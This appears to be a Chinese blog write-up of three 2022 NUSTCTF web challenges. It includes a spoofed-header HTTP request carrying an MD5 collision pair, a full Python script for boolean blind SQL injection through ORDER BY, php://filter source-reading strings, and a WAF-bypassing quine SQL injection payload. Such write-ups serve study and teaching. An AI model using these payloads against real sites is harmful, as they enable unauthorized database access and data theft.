2022NUSTCTF–web

  • Post author:
  • Post category:其他




ezProtocol

web基础

POST / HTTP/1.1
Host: 43.143.7.97:28520
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
referer:http://localhost/
Accept-Language: zh-CN,zh;q=0.9
x-forwarded-for:127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
cookie:dinner=big%20meal
Content-Length: 1004

username=admin&p1=abc%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D6%16y%AC%CE%C5%A1LrY5fn%94%10%D9%01%C3%AC%F8%AAN%21%D0%27%BE%3Ej%A7%22%0C%D08%D3%AF%DFRo%2F%A4%8B%E8%EB45j%E4h%9C%21%22%AB%7E%BC%8E%7C%17%9E%C3Xg%D7%A8%CDHt%BE%AB.%2FWb%3Eb%EA%FC%261%0F_%3D%AFo%3F%1E%DE%E8i%86%7D%BF%C7_Q%CDA%B4%CF%B8n%06Ir%7F%5C%A3k%F9%2AO%DFF%2A%F3%8BcH%FF%85%3F%0D%D0%9B%C7%C8-%12%92&p2=abc%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D6%16y%AC%CE%C5%A1LrY5fn%94%10%D9%01%C3%ACx%AAN%21%D0%27%BE%3Ej%A7%22%0C%D08%D3%AF%DFRo%2F%A4%8B%E8%EB45%EA%E4h%9C%21%22%AB%7E%BC%8E%7C%17%9E%C3%D8g%D7%A8%CDHt%BE%AB.%2FWb%3Eb%EA%FC%261%0F_%3D%AFo%BF%1E%DE%E8i%86%7D%BF%C7_Q%CDA%B4%CF%B8n%06Ir%7F%5C%A3k%F9%2A%CF%DEF%2A%F3%8BcH%FF%85%3F%0D%D0%9BG%C8-%12%92



Ezsql

order by注入

实际漏洞挖掘中遇到的web利用方式,而且是非常常见的漏洞,一般这种漏洞有个比较明显的特征,传参为desc或asc



分析

打开题目 点击查询后

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VK8WO1ux-1668666193542)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114153015945.png)]

发现是排序,应该就是比较典型的漏洞:order by 排序sql注入

猜测查询语句就是

select * from table order by {sort}

,mysql中排序有两种 desc asc,存在盲注的可能

首先我们先试试堆叠注入和联合注入

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-f8sMxGYv-1668666193543)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114153219187.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8NzdrTjQ-1668666193543)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114153256592.png)]

都不行 这里出题人说是对传递的参数sort进行了处理 无法联合注入和堆叠注入

考虑asc和desc两种状态 可以考虑布尔盲注

但是当时没有考虑当什么姿势利用布尔注入,看到wp后出题人说的是

,rand(0) ,rand(1)

返回结果不同 可以利用此处 但是

原理是什么有点不是很清楚!有无大佬解释下!

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IF2K8Erx-1668666193544)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114153719310.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hSpGWiBM-1668666193544)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114153728273.png)]

我们写脚本 构造payload



payload

import requests, time

url = "http://47.103.60.98/index.php?sort=desc,"


# mydb
def get_database():
    global url
    flag = ""
    for i in range(1, 30):
        for j in range(32, 127):
            newurl = url + f"rand(if(ascii(substr(database(),{i},1))={j},0,1))"
            resp = requests.get(newurl)
            time.sleep(0.05)
            # print(i,j,chr(j))
            if resp.text.find("Allen") > resp.text.find("Mary"):
                flag += chr(j)
                print(flag)
                break
            elif j == 126:
                return

# position
def get_tables():
    global url
    flag = ""
    for i in range(1, 30):
        for j in range(32, 127):
            new_url = url + f"rand(if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{i},1))={j},0,1))"
            resp = requests.get(new_url)
            # print(j)
            if resp.text.find("Allen") > resp.text.find("Mary"):
                flag += chr(j)
                print(flag)
                break
            elif j == 126:
                return
# id,name,position
def get_columns(table):
    global url
    flag = ""
    for i in range(1, 30):
        for j in range(32, 127):
            new_url = url + f"rand(if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='{table}'),{i},1))={j},0,1))"
            resp = requests.get(new_url)
            print(j)
            if resp.text.find("Allen") > resp.text.find("Mary"):
                flag += chr(j)
                print(flag)
                break
            elif j == 126:
                return
def get_value(column,table):
    global url
    flag = ""
    for i in range(1, 30):
        for j in range(32, 127):
            new_url = url + f"rand(if(ascii(substr((select/**/{column}/**/from/**/{table}/**/limit/**/2,1),{i},1))={j},0,1))"
            resp = requests.get(new_url)
            if resp.text.find("Allen") > resp.text.find("Mary"):
                flag += chr(j)
                print(flag)
                break
            elif j == 126:
                return
# get_database()
# get_tables()
# get_columns("position")
# flag{f96cb1d4fa4022d1616b799367f078a3}
get_value('name','position')
get_value('position','position')

有时候 group_concat 查不出来的 limit 可以试试



Translate

quine注入

为什么叫translate,是因为一开始的难点是用的pgsql数据库中的translate函数来代替最终payload中的部分replace函数。但是由于一些原因最终还是换成了mysql数据库

过滤了char(),用十六进制代替。限制了replace的使用次数最多为三次,大小写可以绕过



分析

打开题目 一个登录框

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uSB6xwaY-1668666193544)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114150335473.png)]

查看源码,发现敏感信息 base64解码看看,是 test.php 访问他看看

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hqAZqAem-1668666193545)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114150406504.png)]

给出一段php代码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6TRLAkLS-1668666193546)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114150457442.png)]

首先传入的file不能是文件名,is_file 可以通过php伪协议或者伪造目录绕过

而且我们发现存在filter

先尝试传值 看看过滤了什么

base64 string index fun 都被禁用

我们使用读取源码

php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

这里给出常见的php伪协议读取源码的方式

php://filter/read/convert.base64-encode/resource=flag.php
php://filter/NewStar/read=string.rot13/resource=flag.php
php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

发现给出了部分的源码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KmzL0163-1668666193546)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114150818817.png)]

我们从上面可以看出

  • 首先对输入的密码进行检查,存在过滤
  • 其次当输入的密码和查询的密码一致时输出flag,典型的quine注入

但是用户名我们未知 这里可以猜测一下 猜测不到可以弱用户民爆破,一猜就猜到了 admin (最常用的)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0Bc1qP8h-1668666193546)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114151736021.png)]

基本payload
xxxxxreplace(replace('str',char(34),char(39)),char(46),'str')#
str:(str中有单引号的话要写成双引号)
xxxxxreplace(replace(".",char(34),char(39)),char(46),".")#

1'union/**/select/**/replace(replace('1"union/**/select/**/replace(REPLACE(".",0x34,0x39),0x46,".")#',0x34,0x39),0x46,'1"union/**/select/**/REPLACE(REPLACE(".",0x34,0x39),0x46,".")#')#

构造payload
1'union/**/select/**/replace(replace('1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

然后发现被waf挡住了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AFTyrv4K-1668666193547)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114152001339.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ldVwdD8a-1668666193547)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114152029111.png)]

大概waf过滤了:char 空格

  • 查找发现过滤了char 我们使用0x替换
  • replace的次数不能超过三次 使用大小写绕过限制

修改payload

Y'union/**/select/**/replace(REPLACE('Y"union/**/select/**/replace(REPLACE(".",0x22,0x27),0x2e,".")#',0x22,0x27),0x2e,'Y"union/**/select/**/replace(REPLACE(".",0x22,0x27),0x2e,".")#')#

输出了flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ewT646Z0-1668666193548)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221114152842712.png)]



payload

password=Y'union/**/select/**/replace(REPLACE('Y"union/**/select/**/replace(REPLACE(".",0x22,0x27),0x2e,".")#',0x22,0x27),0x2e,'Y"union/**/select/**/replace(REPLACE(".",0x22,0x27),0x2e,".")#')#&username=admin



java的不太会!



版权声明:本文为bossDDYY原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。